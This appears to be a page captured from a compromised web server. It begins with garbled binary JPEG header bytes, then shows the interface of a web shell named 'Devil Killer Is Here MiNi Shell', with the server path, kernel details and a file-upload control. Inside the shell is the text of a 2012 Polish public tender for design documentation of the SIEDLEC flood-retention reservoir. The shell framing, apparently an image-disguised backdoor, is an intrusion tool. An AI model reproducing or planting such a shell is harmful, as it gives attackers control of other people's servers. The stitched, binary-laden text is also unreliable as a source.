JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120816/176987-N-2012.html

<p class="kh_header"><b>Opole: Budowa zbiornika retencyjnego SIEDLEC z funkcją przeciwpowodziową na rzece Cielnica gmina Otmuchów</b><br>
<b>Numer ogłoszenia: 176987 - 2012; data zamieszczenia: 16.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Zarząd  Melioracji i Urządzeń Wodnych , ul. Katowicka 55, 45-061 Opole, woj. opolskie, tel. (077) 442-57-42, faks (077) 442-57-42, 4425726.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wzmiuw.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa zbiornika retencyjnego SIEDLEC z funkcją przeciwpowodziową na rzece Cielnica gmina Otmuchów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia

Przedmiotem zamówienia jest: wykonanie kompleksowej dokumentacji projektowo - kosztorysowej zbiornika retencyjnego Siedlec na rzece Cielnicy o parametrach: powierzchnia zalewu przy NP - około 20ha, pojemność przy NP - 1,3mln. m3 średnia głębokość 3,0m  wraz z obiektami związanymi z nim funkcjonalnie,  uzyskanie w imieniu Zamawiającego decyzji o pozwoleniu na realizację inwestycji w trybie ustawy z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych, uzyskanie wszelkich uzgodnień i opinii (koszty obciążają Oferenta).

Cel inwestycji: 
Zbiornik ma pełnić funkcję w okresach suszy - retencja wody do nawodnień, ochrona gruntów przed erozją oraz ochrona przed powodzią.

2.	Skład dokumentacji:
a)	Projekt Koncepcyjny
b)	Dokumentacja do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia 
c)	Dokumentacja geologiczno-inżynierska
d)	Dokumentacja do wniosku o wydanie decyzji - pozwolenia wodnoprawnego
e)	Dokumentacja geodezyjno - kartograficzna
f)	Dokumentacja Projektu Budowlanego
g)	Dokumentacja Projektów Wykonawczych
h)	Dokumentacja Kosztorysowa i Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót (S.S.T.W. i O.R.)
i)	Dokumentacja do wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji
j)	Projekt rozruchu
k)	Instrukcja obsługi i eksploatacji obiektów i urządzeń

2.1. Projekt Koncepcyjny
Projekt koncepcyjny to opracowanie wstępne, które po uzyskaniu akceptacji Zamawiającego stanowić będzie dla Wykonawcy podstawę do kontynuowania dalszych prac projektowych.
Ramowa zawartość stadium Projektu Koncepcyjnego:
1)	plan zagospodarowania terenu, składający się z części graficznej, sporządzonej na mapie zasadniczej z wyraźnym zaznaczeniem działek, na których zlokalizowana będzie inwestycja oraz z części opisowej - odnoszący się do podstawowych założeń projektowanego i istniejącego zagospodarowania oraz uzbrojenia terenu ze wskazaniem ewentualnych rozwiązań wariantowych;
2)	potwierdzenie dostępu terenu inwestycji poprzez projektowany drogowy układ komunikacyjny do drogi publicznej (na podst. art. 35 ust. 3 ustawy o drogach publicznych);
3)	wypisy z ewidencji gruntów dla działek, na których zlokalizowana będzie inwestycja i dla działek sąsiadujących.

2.2. Dokumentacja do wniosku o wydanie decyzji środowiskowej
Dokumentacja do wniosku o wydanie decyzji środowiskowej to opracowanie, którego celem jest przygotowanie i uzyskanie materiałów zgodnie z wymogami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko oraz ustawy z dnia 16 kwietnia 2004r o ochronie przyrody, które to materiały stanowić będą załączniki do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia dla całej projektowanej inwestycji.
Ramowa zawartość stadium dokumentacji do wniosku o wydanie decyzji środowiskowej:
1)	Karta informacyjna przedsięwzięcia,
2)	Poświadczona przez właściwy organ kopia mapy ewidencyjnej z zaznaczonym przebiegiem granic terenu inwestycji oraz obejmującej obszar, na który będzie oddziaływać przedsięwzięcie,
3)	Operat inwentaryzacji zieleni, w tym inwentaryzacja drzew przeznaczonych do wycinki,
4)	Raport o oddziaływaniu przedsięwzięcia na środowisko (OOŚ).

Uwaga:
O konieczności sporządzenia raportu OOŚ zdecyduje właściwy organ ochrony środowiska ustalając dokładny zakres w jakim ma zostać opracowany.

2.3. Dokumentacja do wniosku o ustalenie warunków prowadzenia robót
Przygotowanie niezbędnych materiałów i uzyskanie w imieniu Inwestora decyzji z art. 118 ustawy z dnia 16.04.2004 r. o ochronie przyrody (Dz. U. z 2009 r. Nr 151, poz. 1220, z późn. zm.) ustalającej warunki prowadzenia robót - jeśli będzie dotyczyć.

2.4. Dokumentacja do wniosku o wydanie decyzji - pozwolenia wodnoprawnego
Jest to opracowanie, którego celem jest uzyskanie pozwolenia wodnoprawnego na podstawie
ustawy z dnia 18 lipca 2001 r. Prawo wodne 
Ramowa zawartość stadium Dokumentacji do wniosku o wydanie decyzji - pozwolenia wodnoprawnego:
1)	Operat wodnoprawny wraz z niezbędną dokumentacją hydrologiczną sporządzony zgodnie z wymogami ustawy Prawo wodne.
2)	Instrukcja gospodarowania wodą
3)	Analiza katastrofy hydrotechnicznej i jej skutki dla otoczenia
  

2.5. Dokumentacja geodezyjno - kartograficzna
Opracowanie to należy wykonać zgodnie z obowiązującymi instrukcjami geodezyjnymi, ustawą Prawo geodezyjne i kartograficzne, ustawą o gospodarce nieruchomościami a także aktami wykonawczymi do tych ustaw i wszelkimi innymi przepisami obowiązującymi w tym zakresie.
Dokumentacja powinna spełniać wymogi ustawy o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych.
Ramowa zawartość stadium Dokumentacji geodezyjno - kartograficznej:
1)	Wstępny podział działek, opracowany na podstawie Projektu Koncepcyjnego zaakceptowanego przez Zamawiającego,
2)	Zbiorcza mapa podziału nieruchomości dla wykonanych jednostkowych projektów podziału działek wraz z zachowaniem ciągłości działek pozostałych tj. nie objętych projektami podziału a znajdującymi się na obszarze projektowanej inwestycji.

2.6. Wykonanie dokumentacji geologiczno-inżynierskiej wraz z projektem i jego zatwierdzeniem. Określenie przydatność gruntów występujących w czaszy lub wskazanie rezerwy gruntowej na budowę zapory czołowej i bocznej wraz z badaniami geotechnicznymi  przydatności gruntu do budowy, przeprowadzenie prognozy hydrogeologicznej dla gruntów czaszy zbiornika.

2.7. Dokumentacja Projektu Budowlanego
Dokumentacja Projektu Budowlanego to opracowanie projektowe służące :
	uściśleniu elementów planowanego zadania inwestycyjnego,
	uzyskaniu przez Zamawiającego decyzji o pozwoleniu na realizację inwestycji w trybie ustawy z dnia 8 lipca 2010r. o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych.
Dokumentacja powinna spełniać wymogi w/w ustawy i być wykonana zgodnie z przepisami ustawy Prawo budowlane oraz innymi przepisami i normami obowiązującymi na terenie Rzeczypospolitej Polskiej - mającymi zastosowanie w przedmiocie opracowania.
Ramowa zawartość stadium Dokumentacja Projektu Budowlanego:
1)	Mapy do celów projektowych;
2)	Wypis z rejestru gruntów dla działki inwestorskiej i działek sąsiadujących wraz z mapą
1)	ewidencyjną;
2)	Operat dendrologiczny na podstawie przeprowadzonej inwentaryzacji gatunkowej drzew i krzewów przewidzianych w projekcie do wycinki, z dokładnym i czytelnym zaznaczeniem (kolorem i numerem) drzew i krzewów do usunięcia, ze wskazaniem właściciela. Opracowanie należy uzgodnić z właściwymi jednostkami, a inwentaryzacja ma zawierać między innymi: informację o właścicielu lub posiadaczu nieruchomości, na której rosną drzewa i krzewy, nazwę gatunków drzew i krzewów
3)	Niezbędna inwentaryzacja i ekspertyzy stanu technicznego istniejącej infrastruktury oraz elementów uzbrojenia i zagospodarowania terenu w zakresie koniecznym dla opracowania projektu budowlanego;
4)	Warunki techniczne budowy i przebudowy obiektów, urządzeń infrastruktury, uzbrojenia terenu, sieci i instalacji związanych z projektowaną inwestycją lub z nią kolidujących;
5)	Zezwolenie zarządcy drogi na włączenie drogowego układu komunikacyjnego do sieci dróg Publicznych
6)	Projekt Budowlany obejmujący:
a)	Projekt zagospodarowania terenu,
b)	Projekt architektoniczno - budowlany zbiornika retencyjnego 
7)	Materiały projektowe do uzyskania opinii, uzgodnień i pozwoleń wymaganych
8)	przepisami szczególnymi;
9)	Opinie, uzgodnienia i pozwolenia wymagane przepisami szczególnymi;
10)	Informacja dotycząca bezpieczeństwa i ochrony zdrowia (BIOZ);
11)	Oświadczenie Głównego Projektanta i Sprawdzającego o kompletności i zgodności projektu budowlanego z przepisami i normami;
12)	Komplet uprawnień projektowych i wpisów do izb zawodowych projektantów oraz sprawdzających;
13)	Inne, nie wymienione wyżej dokumenty jakich zażąda organ właściwy w sprawie wydania decyzji o pozwoleniu na realizację inwestycji

2.8. Dokumentacja Projektu Wykonawczego
Projekty wykonawcze powinny zawierać rysunki w skali uwzględniającej specyfikę zamawianych robót i zastosowanych skal rysunków w Projekcie Budowlanym wraz z wyjaśnieniami opisowymi dotyczącymi: istotnych części obiektów, rozwiązań architektonicznych oraz urządzeń budowlanych i wodno-melioracyjnych, rozwiązań konstrukcyjno-budowlanych i materiałowych, instalacji i wyposażenia technicznego, których odzwierciedlenie na rysunkach Projektu Budowlanego nie jest wystarczające. Projekty wykonawcze powinny zawierać wszelkie niezbędne materiały wraz z potrzebnymi uzupełnieniami, opiniami, uzgodnieniami i wymaganymi pozwoleniami istotnymi z punktu
widzenia wykonawstwa.
Projekty wykonawcze powinny uzupełniać i uszczegółowiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do opracowania Dokumentacji Kosztorysowej i S.S.T.W.iO.R. a następnie realizacji na ich podstawie robót budowlanych.

2.9. Dokumentacja Kosztorysowa i Szczegółowe Specyfikacje Wykonania i Odbioru Robót (S.S.T.W.i O.R.)
Dokumentacja przetargowa jest to opracowanie, które stanowić będzie dla Zamawiającego podstawę do przygotowania i ogłoszenia postępowania przetargowego a następnie przygotowania oferty przez wykonawcę i realizacji robót budowlanych.
Ramowa zawartość stadium Dokumentacji Kosztorysowej i S.T.W.iO.R.:
1)	Przedmiary robót - opracowane oddzielnie dla poszczególnych obiektów, etapów i branż robót
2)	Kosztorysy inwestorskie - opracowane oddzielnie dla poszczególnych obiektów, etapów i branż robót
3)	Tabelaryczne - zbiorcze zestawienie wartości kosztorysów inwestorskich
4)	Szczegółowe Specyfikacje Techniczne Wykonania i Odbioru Robót opracowane oddzielnie dla poszczególnych obiektów, etapów i branż robót

3.0. Dokumentacja do wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji
Opracowanie to obejmuje przygotowanie wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji w trybie ustawy z dnia 8 lipca 2010r.  o  szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych, wraz ze skutecznym złożeniem wniosku do właściwego organu.
Ramowa zawartość stadium Dokumentacji do wniosku o wydanie decyzji o pozwoleniu na
realizację inwestycji:
1)	Wypełniony formularz wniosku wraz z wymaganymi dokumentami, opracowaniami, opiniami i decyzjami, wyszczególnionymi w art.6 ustawy.

3.1. Projekt rozruchu

3.2. Instrukcja obsługi i eksploatacji obiektów i urządzeń

3.3. Studium wykonalności

	Obowiązkiem Wykonawcy jest przeprowadzenie wizji lokalnej w terenie oraz uzyskanie, na swoją odpowiedzialność i ryzyko wszelkich istotnych informacji, które mogą być konieczne do przygotowania oferty. Wizję lokalną Wykonawca przeprowadzi na własny koszt.
	Wykonawca zobowiązany jest do czynnego włączenia się i wspierania Zamawiającego w procesie uzyskiwania niezbędnych decyzji administracyjnych . W tym celu Wykonawca będzie niezwłocznie przygotowywać niezbędne korekty i uzupełnienia oraz zmiany w dokumentacji wymagane przez właściwe organy administracji - na każde wezwanie tych organów lub Zamawiającego.
	Wykonawca na własny koszt wykona wszelkie niezbędne badania i ekspertyzy.


Wymagania dotyczące ilości egzemplarzy dokumentacji:
Dokumentację należy opracować w liczbie egzemplarzy:
1)	Projekt Koncepcyjny - 2 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
2)	Dokumentacja do wniosku o wydanie decyzji środowiskowej- 3 egz. w wersji papierowej i 1 egz. w wersji elektronicznej dla Inwestora
3)	Dokumentacja do wniosku o wydanie decyzji - pozwolenia wodno prawnego -               3 egz.w wersji papierowej i 1 egz. w wersji elektronicznej
4)	Dokumentacja geologiczno-inżynierska - 5 egz. w wersji papierowej i 1 egz. w           wersji elektronicznej
5)	Dokumentacja geodezyjno-kartograficzna - 6 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
6)	Dokumentacja Projektu Budowlanego - 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
7)	Dokumentacja Projektu Wykonawczego - 5 egz. w wersji papierowej i 1 egz. w    wersji elektronicznej
8)	Dokumentacja Kosztorysowa - 2 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
9)	S.S.T.W.i O.R. - 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
10)	Dokumentacja do wniosku o wydanie decyzji o pozwoleniu na realizację inwestycji- 6 egz. w wersji papierowej 1 egz. w wersji elektronicznej: wstępny podział działek -6 egz. wersji papierowej ,1 egz wersji elektronicznej, opracowanie zbiorczej mapy podziału nieruchomości dla wykonanych jednostkowych projektów  podziału działek wraz ze sporządzeniem geodezyjnej dokumentacji podziału nieruchomości (projekty podziału sporządzone w trybie ustawy z 8 lipca 2010r.o szczególnych zasadach przygotowania do realizacji inwestycji w zakresie budowli przeciwpowodziowych) - 6 egz. w wersji papierowej,1 egz. w wersji elektronicznej
11)	Projekt rozruchu - 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej
12)	Instrukcja obsługi i eksploatacji obiektów i urządzeń- 5 egz. w wersji papierowej i           1 egz. w wersji elektronicznej
13)	Studium wykonalności- 5 egz. w wersji papierowej i 1 egz. w wersji elektronicznej


Zamawiający zastrzega możliwość fakturowania 30% wartości zamówienia po uzyskaniu decyzji pozwolenie na realizację inwestycji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od żądania wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Warunek posiadania wiedzy i doświadczenia będzie uznany za spełniony, jeżeli Wykonawca wykaże: 
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będą ich łączne kwalifikacje i doświadczenie):
wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej 1 usługi, tj. wykonał co najmniej 1 dokumentację projektową z w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych.
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 4 do niniejszej IDW oraz dokumenty potwierdzające, że usługa została wykonana należycie.
Zaleca się, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców usługi, zostały wykonane należycie zawierały, co najmniej:
a.	wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował usługi, których dokumenty dotyczą,
b.	wskazanie podmiotu, na rzecz którego realizowane były roboty,
c.	wskazanie przedmiotu usługi,
d.	wskazanie wartości usługi,
e.	wskazanie daty wykonania (rozpoczęcia i zakończenia),
f.	opinię podmiotu wskazanego powyżej w pkt. b stwierdzającą, że usługi zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2)	Warunek dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia będzie uznany za spełniony, jeżeli Wykonawca: 

wskaże do uczestniczenia w wykonaniu niniejszego zamówienia następujące osoby/podmioty wraz z informacjami na temat ich kwalifikacji zawodowych, wykształcenia i doświadczenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywania przez nich czynności:
(w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy):

(1) Projektant  
-	posiadający uprawnienia budowlane bez ograniczeń: do projektowania w specjalności budowle hydrotechniczne lub melioracje wodne, zgodnie z ustawą z dnia 7 lipca 1994 r.  Prawo budowlane oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z póź. zm.), potwierdzone stosownymi decyzjami o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 r. Prawo budowlane  (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami) lub inne ważne uprawnienia projektowe w specjalności budowle hydrotechniczne lub melioracje wodne do projektowania bez ograniczeń, wydane na podstawie wcześniej obowiązujących przepisów*.

	(2) Sprawdzający  
-	posiadający uprawnienia budowlane bez ograniczeń: do projektowania w specjalności budowle hydrotechniczne lub melioracje wodne, zgodnie z ustawą z dnia 7 lipca 1994 r.  Prawo budowlane oraz ustawą z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42 z póź. zm.), potwierdzone stosownymi decyzjami o których mowa w art. 12 ust. 2 (z uwzględnieniem art. 104) ustawy z dnia 7 lipca 1994 r. Prawo budowlane  (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami) lub inne ważne uprawnienia projektowe w specjalności budowle hydrotechniczne lub melioracje wodne do projektowania bez ograniczeń, wydane na podstawie wcześniej obowiązujących przepisów*
	

*Wszystkie osoby będące obywatelami krajów członkowskich Unii Europejskiej, które Wykonawca wskaże do uczestniczenia w wykonaniu niniejszego zamówienia i od których wymagane są uprawnienia budowlane, winny posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego zamówienia zgodnie z Ustawą z 18 marca 2008 r. o zasadach uznania kwalifikacji zawodowych nabytych w krajach członkowskich Unii Europejskiej (Dz. U. nr 63 z 2008 r. poz. 394).
W celu potwierdzenia spełniania niniejszego warunku Wykonawcy  zobowiązani są przedłożyć: 
 wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, sporządzony według wzoru stanowiącego załącznik nr 3 do niniejszej IDW, oraz
 oświadczenie Wykonawcy, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, sporządzone według wzoru stanowiącego załącznik nr 3a do niniejszej IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek będzie oceniany wspólnie z warunkiem Potencjał techniczny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek nie będzie oceniany</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
